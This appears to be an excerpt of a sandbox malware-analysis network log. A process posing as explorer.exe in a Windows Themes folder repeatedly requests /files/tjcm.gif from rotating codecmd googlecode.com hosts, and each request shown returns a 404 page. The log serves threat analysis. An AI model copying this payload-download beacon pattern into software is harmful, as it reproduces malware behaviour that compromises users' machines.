                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:13.627127886 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.651189172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:13.999247074 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:14.565170050 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:14 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:14.565270901 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.651190108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:14.989363909 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:15.695171118 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:15 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:15.695242882 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.651191142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:16.090449095 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:16.795217991 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:16 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:16.795247078 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.651192172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:17.210685015 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:17.768522978 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:17 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:17.768569946 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.651193108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:18.147392988 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:18.871962070 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:18 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:18.871987104 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.651194142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:19.233473063 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:19.949120045 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:19 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:19.949358940 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.651195172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:20.324139118 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:20.894926071 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:20 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 